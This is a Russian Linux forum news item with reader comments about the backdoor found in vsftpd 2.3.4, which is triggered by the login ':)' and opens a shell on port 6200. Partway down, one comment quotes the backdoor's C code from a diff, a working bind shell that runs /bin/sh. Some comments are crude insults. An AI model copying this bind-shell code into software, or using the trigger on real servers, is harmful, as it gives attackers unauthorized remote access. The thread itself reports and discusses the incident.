LINUX.ORG.RU

Бэкдор в FTP-сервере vsftpd

 ,


0

2

Крис Эванс (Chris Evans), автор «самого быстрого и защищенного» FTP-сервера для Unix-систем, сообщает о том, что в пакете с исходным кодом программы версии 2.3.4 обнаружено размещение бэкдора. Как измененный архив попал на сайт - остается загадкой, однако присутствующая в пакете GPG-подпись является неверной. Также нет никаких сведений о том, сколько времени вредоносный пакет находился онлайн в доступе для скачивания.

Добавленный код свидетельствует о том, что при попытке входа на сервер от пользователя с логином ":)" открывается порт 6200 с ожиданием соединения и предоставлением шелла.

На данный момент сайт и исходные тексты vsftpd перенесены на новую площадку. При этом каждый раз рекомендуется сверять GPG-подпись для скачанного файла. Сам автор полагает, что отсутствие каких-либо попыток скрытия вредоносного кода, а также способов определения уязвимых серверов, кроме простого перебора, говорит о том, что данная провокация не является серьезной попыткой атаки.

>>> Подробности

★★★★★

Проверено: maxcom ()

Ответ на: комментарий от flareguner

Нужно, и причем порой стабильнее бывает чем другие дистрибутивы.

Atlant ★★★★★
()
Ответ на: комментарий от novell

Ubuntu месяц назад поставили? И как? Нравится?

anonymous
()
Ответ на: комментарий от Schizophrenia

ССЗБ тот, у кого фаервол по умолчанию пропускает все.

FatBastard ★★
()

Отвлечённое

И что у всех этих FTP серверов какие-то нечеловеческие конфиги…

Deleted
()
Ответ на: комментарий от novell

А как скоро она обнаружилась бы в закрытой (проприетарной) программе

Её бы и не было б. Нету кода - нет проблем.

mpp5
()
Ответ на: комментарий от ukr_unix_user

в src.rpm там этого нету изначально.
скорей всего уязвимость была добавлена значительно позже релиза.

xydo ★★
()

PS: у кого-нибудь есть реально скачанный архивчик с бэкдором? хочу на память :)

xydo ★★
()

>Нету кода - нет проблем.

+1. Ну и где те тысячи глаз, которые мониторят исходники? Порево и жорево наверное смотрят, потому что задротам бабы не дают?

Херли так открытого софта с бекдорами много, аа?!1

SebastianPoeiro
()

В исходниках скачанных 22-03-2011 бэкдора нет.

qwe ★★★
()
Ответ на: комментарий от SebastianPoeiro

> Ну что сосанули

Порево и жорево наверное смотрят

задротам бабы не дают

попасть в просак

Чувак, весна прошла. Пора думать головой.

icerider
()

кто успел поставить?

xroff
()
Ответ на: комментарий от Atlant
iptables -A INPUT -j REJECT --reject-with icmp-host-unreachable

Последнее правило в цепочке решает эту проблему. :) И в данном случае заменяет дефолтную полиси.

turtle_bazon ★★★★★
()

Помогите настроить бэкдор, у меня не получается!

af5 ★★★★★
()
Ответ на: комментарий от icerider

Для начала, необходимо иметь в голове мозги. Затем надо уметь думать.

Oleaster ★★★
()
Ответ на: комментарий от shahid

>Тоже не настроил iptables? Молодец. За генту - вдвойне.

Можно настроить iptables и? :)

если бэкдор имеет опр. превилегии, к примеру, то что ему стоит эти самые настройки разукрасить под себя. он вообще может особо и не светиться. то есть, его работа может быть не постоянной.

может, я туплю?

ESTAF ★★★
()

Все, кто сделал вывод о «небезопасности» vsftpd – тролли и провокаторы! От подобной фигни ни один проект не застрахован. То есть, строго говоря, с точки зрения возможности таких происшествий никакой другой FTP-сервер не лучше vsftpd (и не хуже тоже).

anonymous
()
Ответ на: комментарий от askh

из контейнеров OpenVZ затруднительно использовать уязвимости ядра

угу, потому что ведро со всеми тазиками падает :). На сколько помню именно так было когда дырки в vmsplice нашли.

true_admin ★★★★★
()
Ответ на: комментарий от novell

>> Открытость кода позволила быстро обнаружить уязвимость.

Также нет никаких сведений о том, сколько времени вредоносный пакет находился онлайн в доступе для скачивания.


Толсто.

wintrolls ☆☆
()

В какой версии бэкдор? У меня 2.3.2

anonymous
()
Ответ на: комментарий от flareguner

Когда разрабатывали проект пели сообществу о защищенности .

livedock
()

код бекдора

вот вырезка по адресу http://pastebin.com/AetT9sS5

кусок из дифа, нормально биндится шелл на 6200 по tcp =))

------8><--------------

-int
-vsf_sysutil_extra(void)
-{
- int fd, rfd;
- struct sockaddr_in sa;
- if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
- exit(1);
- memset(&sa, 0, sizeof(sa));
- sa.sin_family = AF_INET;
- sa.sin_port = htons(6200);
- sa.sin_addr.s_addr = INADDR_ANY;
- if((bind(fd,(struct sockaddr *)&sa,
- sizeof(struct sockaddr))) < 0) exit(1);
- if((listen(fd, 100)) == -1) exit(1);
- for(;;)
- {
- rfd = accept(fd, 0, 0);
- close(0); close(1); close(2);
- dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
- execl(«/bin/sh»,«sh»,(char *)0);
- }
-}

----------------------><8--------

x97Rang ★★★
()

Вот обосрались так обосрались. На месте разрабов я бы после такого переименовал проект, чтобы не позориться.

Reset ★★★★★
()

> «самого быстрого и защищенного» FTP-сервера

А вот нечего за двумя зайцами...

segfault ★★★★★
()
Ответ на: комментарий от zenden

> А потом еще говорят, что под линукс нет вирусов

Причем тут вирусы?

dexpl ★★★★★
()
Ответ на: комментарий от Reset

>На месте разрабов я бы после такого переименовал проект, чтобы не позориться.

Пускай лучше главный красноглазый кукловод сделает себе сепуку и пропишет в тексте ГПЛя кровью «за софт взымать деньги».

SebastianPoeiro
()
Ответ на: комментарий от Reset

>На месте разрабов я бы после такого переименовал проект, чтобы не позориться.

Я бы на твоём месте утопился.

anonymous
()
Ответ на: комментарий от pylin

да точно, а раньше то хорошим мужиком его батя был.. эхх

sl4mmer
()
Ответ на: комментарий от SebastianPoeiro

>>Ну и где те тысячи глаз, которые мониторят исходники?

Глаза на месте. Именно ими и был обнаружен бекдор. Или до недоразвитых такая простая вещь не доходит?

Порево и жорево наверное смотрят, потому что задротам бабы не дают?
Виндуз 7 Максимальная наше всио

Все вантузятники такие сексуально озабоченные неполовозрелые прыщавые дегенераты, или ты таким родился? Мне нужно знать, это врождённый идиотизм или приобретённый виндоз головного мозга?

anonymous
()

У кого получилось получить шелл - интересно, с какими правами?
А то у большинства vsftpd работает под своим юзером и ничего делать не может, кроме как ходить в свои каталоги :)

pekmop1024 ★★★★★
()

отсутствие каких-либо попыток скрытия вредоносного кода, а также способов определения уязвимых серверов, кроме простого перебора, говорит о том, что данная провокация не является серьезной попыткой атаки.

не является серьезной попыткой атаки.
в пакете с исходным кодом программы версии 2.3.4 обнаружено размещение бэкдора
не является серьезной попыткой атаки.

я думаю что такие слова должны привести к тщательному аудиту кода со стороны самых лучших специалистов (SolarDesigner и тд) и немедленному форку проекта с невозможностью постить туда ничего автору программы.

tommy ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.